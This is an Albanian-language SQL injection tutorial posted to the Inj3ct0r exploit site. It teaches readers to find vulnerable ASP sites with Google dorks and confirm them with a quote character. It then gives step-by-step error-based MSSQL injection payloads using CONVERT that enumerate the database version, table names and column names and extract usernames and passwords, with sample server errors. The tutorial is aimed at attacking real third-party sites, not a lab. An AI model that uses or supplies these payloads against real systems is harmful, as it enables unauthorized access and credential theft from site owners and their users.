============================== MSSQL Injection Tutorial [ALB] ============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Hi.I Just Visited You WebPage & I wrote this Tutorial.It shows how you can use MSSQL-i to get to the important data.I Wrote it in ALBANIAN language,so i hope that with this i can get you more Albanian visitors (HACKERS).There are lot,but they arent famous.Hope You will publish it.And Commin soon in English.Waiting for ur Reply.:P.BEst Wishes check out the rest of the Windows Live . More than mail Windows Live goes way beyond your inbox. http://www.microsoft.com/windows/windowslive/ *************************************************** Ne Kete Tutorial DO Ju Tregoj Se SI te Arini Deri Tek Te Dhenat e Web-it Duke Perdorur MSSQL-i Metoden. Ne KĘtĘ Tutorial do tĘ pĘrdorim kĘtĘ lloj tĘ sulmit: "ODBC Error Message Attack with "CONVERT" 1.Njihere Duhet Te Kerkojm Faqe Qe Jan Vulnerable. --------------------------------------------------- Per Te GJetur Faqe qe jan Vulnerable eshte shum e lehte :P.Per Kete mund ta perdorim Google :D. Shkojm dhe e Hapim www.google.com Dhe Kerkojm me DORKS. Si Shembull une i mora Disa.Ju Mund TE GJeni Edhe PLot Tjera. Shkruajm psh: inurl: "news.asp" "sub" inurl: "games.asp" "id" inurl: ".asp" "id" ....etj 2. Tani Duhe ta Provojm Faqen a eshte Vulnerable per MSSQL-i. ------------------------------------------------------------- Edhe KJo Eshte ShUm e Lehte.Kjo Behet Duke Shtuar Stringun (') Pas Id=100. Ne Rast Se Na Pergjigjet Duke Dhene Error ,atehere e Kuptojm Se Faqeja Eshte Vulnerable.DIsa Prej Pergjigjeve me te shpeshta jane: ++++++++++++++++++++++++++++++++++++++++++++++ ODBC Microsoft Access Driver Unclosed quotation mark Microsoft OLE DB Provider for Oracle Division by zero in Microsoft OLE DB Provider for SQL Server error '80040e14' Dhe TE Themi se Na Eshte DHene Nje Pergjigje psh: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'. /msn/shared/includes/main_rub.asp, line 4 ++++++++++++++++++++++++++++++++++++++++++++++++ Kjo Dmth Se Faqja Eshte Vulnerable Per Atack!!! 3.Si Ta Gjejm Versionin e Data Bazes (DB)? ------------------------------------------ Nese Webi Eshte Keshte:www.localhost.com/lajmi.asp?id=100 Atehere ja Shtojm Kete Pjese Prapa +or+1=convert(int,(@@version))-- Dhe Ne FUnd BEhet Keshtu:www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))-- Dhe Na Jep Pergjigje: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (VM) ' to data type int. /msn/shared/includes/main_rub.asp, line 4 Dmth E Gjetem Versionin! Tani SHkojm ME Shum :P 4.Si Te Gjejm Emrat E Tabelave apo (table_name) ------------------------------------------------ Per Te GJetur tabelat e ndonje webi nepermjet kesaj metode Shkruajme: psh: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))-- Dhe DO Na Shfaqet nje Error psh: Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'Users' to data type int. /msn/shared/includes/main_rub.asp, line 4 Dmth E Gjetem tabelen e pare.tabela e pare eshte "Users",tani per te gjetur tabelen e radhes: psh: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))-- DHe Perseri do na shfaqet nji error i njejt dhe no na jep tabelen e dyte: psh: Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'lajmet' to data type int. /msn/shared/includes/main_rub.asp, line 4 Dmth Tabela e dyte eshte 'lajmet'..Dhe KEshtu Vazhdojm me radhe per Tabela Tjera 5.Si Te Zbulojm column_names (emrat e kulumnave) . -------------------------------------------------- -Nese Duam Qe te zbulojme column_name per tabelen "Users" Pasi ketuh me se shpeshti jan userat dhe passwordat shkojme: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))-- Dhe duhet te na nxjer nje error si ky: Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'username' to data type int. /msn/shared/includes/main_rub.asp, line 4 Pra Emri i Kolumnes se pare per tabelen "Users" eshte "username" Tani duhet ta gjemjm kolumnen e dyte per tabelen e njejt: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))-- Dhe Na Nxjer Pergjigje (Error) Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'password' to data type int. /msn/shared/includes/main_rub.asp, line 4 Domethene e gjetem edhe Emrin e Kolumnes se dyte.column_name eshte "password",Tani nese duam mund te vazhdojm te gjejm column_names e radhes por kto jan 2 gjerat ma me rendesi per HACK!! :D 6.Si ti marim te dhenat qe na Interesojn psh (Username,Password,etj) :P ------------------------------------------------------------------------- NĘ kĘtĘ pjesĘ e tĘra qĘ duhet bĘrĘ ĘshtĘ tĘ zevenĘsojmĘ tabelen(table_name) dhe emrat e kolumnave(column_name) nĘpĘr vendet e tyre qĘ mĘ parĘ i kemi gjetur. ShkojmĘ tani ti zĘvendĘsojmĘ psh: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))-- Dhe na Nxjer Pergjigje: Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'Admin' to data type int. /msn/shared/includes/main_rub.asp, line 4 Domethene se username eshte :Admin ZĘvendĘsojmĘ tani kolumnĘn e parĘ "username" me kolumnĘn e dytĘ "password": psh: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))-- Dhe Na Nxjerr: Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value '123456' to data type int. /msn/shared/includes/main_rub.asp, line 4 Domethene Passwordi Eshte: 123456 Dhe Njejt VAzhdojm per te dhenat tjera. Ja pra kemi arritur tĘ marrim disa nga info-tĘ, si username/pass dhe e njĘ faqe. username: Admin password: 123456 Besoj Se DO JU Ndihmoj Sado Pak.. Hackim Te Kendshem ******************************************* Tuto by:**RoAd_KiLlEr** ******************************************* Greetz to:Ton!WidnowS,Alboz-Crew,Inj3ct0r ******************************************* WwW.inj3ct0r.com ******************************************* ---------------------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]